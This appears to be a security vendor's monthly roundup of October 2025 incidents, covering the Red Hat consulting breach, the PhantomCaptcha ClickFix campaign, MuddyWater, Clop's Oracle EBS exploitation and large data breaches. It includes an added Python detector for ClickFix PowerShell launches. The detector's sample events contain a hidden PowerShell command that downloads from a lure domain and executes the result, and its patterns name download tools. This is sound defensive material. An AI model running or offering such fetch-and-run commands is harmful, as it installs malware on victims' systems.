October 2025: Oracle Exploitation, Red Hat Incident, PhantomCaptcha, and Major Breaches
October 2025 brought forward a mix of high-impact data breaches, targeted intrusion campaigns, and continued activity from well-established threat groups. Several incidents involved extensive data exposure across government, healthcare, and financial services, while others highlighted ongoing interest in enterprise platforms such as Oracle E-Business Suite. Social-engineering-driven operations, including ClickFix-based activity, also remained prevalent throughout the month.
Below is a breakdown of the major cyberattacks seen in October 2025 and the developments that defined last month’s activity.
Crimson Collective Claimed Large-Scale Theft From Red Hat’s Consulting Repositories
The Red Hat incident dominated October 2025 after the Crimson Collective extortion group claimed it had stolen hundreds of gigabytes of data from the company’s consulting GitLab environment.
The group began posting samples on October 1, alleging access to more than 28,000 internal repositories containing consulting engagement materials, Customer Engagement Reports, and configuration files. Listings referenced over 800 organizations, with both major enterprises and U.S. government agencies appearing in the directory samples shared by the attackers.
Red Hat confirmed unauthorized access to a consulting-specific GitLab instance and stated that the breach did not extend to its products, software supply chain, or other internal systems. Investigations indicated the exposed data largely consisted of project documentation and code samples, though attackers asserted they had obtained broader access.
The extortion effort escalated throughout October as Crimson Collective aligned itself with ShinyHunters and Scattered Lapsus$ Hunters and threatened public leaks. By mid-month, the group began advertising what it called the “Red Hat Consulting Backup” dataset for sale, placing a valuation in the hundreds of thousands of dollars. Researchers also connected the group to separate cloud-focused activity targeting AWS environments through exposed access keys and misconfigured IAM policies, signaling a wider campaign beyond the Red Hat intrusion.
Threat actor card of Scattered Lapsus$ Hunters
PhantomCaptcha ClickFix Campaign Targeted Ukraine-Focused Aid and Government Organizations
ClickFix activity continued rising in October 2025, and PhantomCaptcha stood out as a coordinated example of this technique in action. The campaign focused on staff at the International Red Cross, UNICEF, the Norwegian Refugee Council, and several Ukrainian regional administrations. Attackers impersonated the Ukrainian President’s Office and sent an eight-page PDF styled as an official memo.
Opening the file led victims to a fake Zoom page at zoomconference[.]app, where a staged verification prompt guided them into running a PowerShell command. This user-assisted execution allowed the operators to install malware without relying on a traditional exploit.
Researchers noted that the public-facing domains were active for only a day to limit visibility, while backend servers remained online to manage infected systems. They also linked PhantomCaptcha to a related ecosystem distributing Android spyware through deceptive applications.
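As an added illustration, not code from the SOCRadar post, the Python sketch below shows how a defender might flag the user-assisted PowerShell execution pattern that PhantomCaptcha relied on: a PowerShell process spawned from an interactive parent (the shape a pasted command takes) whose command line hides its window, fetches remote content, or runs an encoded payload. The log format, the parent-process heuristic, and the sample events are constructed assumptions.

```python
"""Flag ClickFix-style, user-assisted PowerShell launches in process-creation events."""
import re
from dataclasses import dataclass

# Constructed sample events in a minimal "parent|image|cmdline" layout (not real telemetry).
# The domain is written defanged, as in the post; a real event would carry the live hostname.
SAMPLE_EVENTS = [
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr https://zoomconference[.]app/verify | iex"',
    "explorer.exe|powershell.exe|powershell -NoProfile -c Get-Date",
    "services.exe|powershell.exe|powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "wscript.exe|powershell.exe|powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
]

# Parents that indicate a human typed or pasted the command (assumption: Run dialog / desktop shell).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits commonly paired with copy-paste lures; each match adds one reason.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_fetch": re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "url": re.compile(r"https?://", re.I),
}


@dataclass
class Finding:
    event: str
    reasons: list


def analyze(event: str):
    """Return a Finding for one event, or None when it looks benign."""
    parent, image, cmdline = event.split("|", 2)
    if image.lower() not in {"powershell.exe", "pwsh.exe"}:
        return None
    reasons = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmdline)]
    interactive = parent.lower() in INTERACTIVE_PARENTS
    # Alert on an interactive parent with any trait, or on two traits regardless of parent,
    # so a scheduled "-File" script from services.exe is not flagged on its own.
    if (interactive and reasons) or len(reasons) >= 2:
        return Finding(event, reasons)
    return None


def detect(events):
    """Run analyze() over a batch and keep only the flagged events."""
    return [f for f in (analyze(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding.reasons, "<-", finding.event)
```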
For insights into the rise of ClickFix techniques in 2025, read SOCRadar’s analysis: “ClickFix & FileFix: How a Copy-Paste Trick Became 2025’s Top Social Engineering Threat”.
MuddyWater Targeted Over 100 Government Entities Using Phoenix v4 Backdoor
Iran’s state-sponsored hacking group MuddyWater returned to prominence with a sweeping espionage campaign that reached more than 100 government and diplomatic organizations across the Middle East and North Africa.
The activity began on August 19, 2025, when the group leveraged a compromised email account to send phishing messages carrying a seemingly routine Word document. Once recipients enabled macros, the file installed the FakeUpdate loader, which then deployed Phoenix v4, an updated version of MuddyWater’s long-used backdoor.
Phoenix v4 allowed the operators to profile systems, maintain persistence, and execute remote commands. Researchers also identified a separate credential-harvesting tool designed to pull browser data from Chrome, Edge, Opera, and Brave. The attackers shut down their initial server infrastructure on August 24, a shift that suggested the operation had moved into a quieter collection phase.
Well-known tooling, familiar code patterns, and consistent regional targeting enabled researchers to link the campaign to the Iranian state-backed group with high confidence.
Clop Ransomware Group Exploited Oracle EBS
Oracle’s October 2025 security alert introduced CVE-2025-61884, a high-severity vulnerability affecting supported versions of Oracle E-Business Suite from 12.2.3 through 12.2.14. Oracle disclosed the issue on October 11, and shortly afterward it was added to CISA’s Known Exploited Vulnerabilities catalog, signaling confirmed in-the-wild abuse.
Quick details of CVE-2025-61884 (SOCRadar LABS, CVE Radar)
Its emergence closely followed earlier EBS exploitation involving CVE-2025-61882, a case also linked to Clop ransomware operations. Researchers noted that leaked exploit code and earlier attacks appeared to accelerate interest in related components, including the UiServlet endpoint now tied to CVE-2025-61884.
Clop continues publishing names of alleged victims connected to Oracle EBS compromises across finance, manufacturing, and professional services, among other sectors.
SOCRadar XTI: Contextual Intelligence for Modern Defense Teams
Modern campaigns often combine exploited vulnerabilities, credential theft, and social-engineering tactics, making it difficult for security teams to keep pace. SOCRadar’s Extended Threat Intelligence (XTI) platform brings these signals together by correlating CVEs, threat actor activity, leaked data, and exploit availability into a single operational view.
With the Cyber Threat Intelligence module, teams can track how vulnerabilities evolve, understand which actors are weaponizing them, and prioritize remediation based on real-world exploitability rather than patch lists alone. The platform’s enrichment feeds, technical reports, and automated alerts help analysts focus on high-impact risks as they emerge.
SOCRadar’s CTI module, Vulnerability Intelligence
For organizations looking to turn scattered intelligence into actionable security decisions, SOCRadar’s CTI provides the context needed to respond faster and stay aligned with evolving attack paths.
Prosper Database Intrusion Exposed Information of More Than 17 Million Accounts
Prosper confirmed that attackers gained access to one of its internal databases and extracted customer and applicant information. While the company stated that no customer accounts or funds were accessed, the breach involved confidential and personal data held within Prosper’s systems.
The peer-to-peer lending platform contained the intrusion on September 2 and notified law enforcement shortly afterward.
Although Prosper initially disclosed only that Social Security numbers were among the compromised fields, additional details emerged when Have I Been Pwned ingested the dataset. According to the breach notification service, the stolen information relates to approximately 17.6 million accounts and includes names, physical and email addresses, dates of birth, government identification fields, IP addresses, and financial profile data such as employment status, income, and credit status.
Details of the Prosper data breach (HIBP)
Conduent Data Breach Exposed Sensitive Information of More Than 10.5 Million Individuals
Conduent disclosed in October 2025 that a large-scale data breach stemming from a 2024 compromise affected at least 10.5 million people, based on filings with multiple US state attorneys general.
The company provides business process outsourcing and digital services for government agencies and enterprises, which significantly widened the impact across states. Exposed information varied by individual and may have included names, Social Security numbers (SSNs), dates of birth, health insurance identifiers, and medical details.
Although Conduent stated it had no evidence of misuse as of October 24, 2025, the breach originated from an intrusion traced back to October 21, 2024.
Medusa Ransomware Breach Exposed Data of More Than 1.2 Million SimonMed Patients
SimonMed Imaging reported a significant data breach after the Medusa ransomware group claimed responsibility for an intrusion that resulted in the theft of roughly 200 GB of data.
The provider, one of the largest outpatient imaging networks in the United States, detected suspicious activity on January 28, 2025, following a vendor alert. An internal investigation later confirmed unauthorized access from January 21 through February 5, affecting more than 1.2 million individuals.
The compromised information varied widely and may have included patient demographics, appointment details, diagnostic data, imaging records, insurance information, government identifiers, financial data, and in some cases authentication credentials or biometrics. After containing the intrusion, the organization implemented additional security measures, including password resets, expanded MFA, endpoint monitoring, and reduced third-party access.
Medusa added SimonMed to its leak site and issued a $1 million ransom demand, underscoring continued pressure on healthcare providers facing large-scale data extortion events.
Threat actor card of Medusa Ransomware
BreachForums Seized Again Amid Ongoing Salesforce-Related Extortion Activity
Although not a cyberattack, one of October’s notable developments was the law-enforcement seizure of the latest BreachForums domain.
U.S. and French authorities took down breachforums[.]hn on October 10, targeting a platform that had recently shifted from a forum format to a clearnet leak site used in extortion activity linked to Scattered Lapsus$ Hunters and ShinyHunters, particularly involving Salesforce-related breaches. The seized domain displayed an official notice, while the group’s onion service remained online.
Takedown announcement on the breachforums[.]hn domain.
ShinyHunters acknowledged the takedown in a PGP-signed statement, confirming the loss of infrastructure and historical data but asserting that their broader extortion efforts would continue.
The seizure added to BreachForums’ long cycle of shutdowns and reappearances and underscored increasing law-enforcement pressure on groups relying on public leak portals to amplify their campaigns.
Improve Exposure Awareness With SOCRadar’s Dark Web Monitoring
As threat groups continue to rely on leak portals, Telegram channels, and closed forums to trade data and coordinate extortion, visibility into these spaces has become a critical part of incident preparedness.
SOCRadar’s Dark Web Monitoring continuously reviews these environments for mentions of company assets, leaked credentials, internal documents, or threat actor discussions involving your organization. Security teams receive timely alerts when new material appears, along with context about the actors involved and how the data is being used. This makes it possible to investigate exposures early, verify authenticity, and begin remediation before information spreads more widely.
SOCRadar’s Dark Web Monitoring
For organizations facing growing risks from data theft and extortion operations, SOCRadar’s monitoring capabilities offer a practical way to stay informed about what surfaces online and how it may affect ongoing security efforts.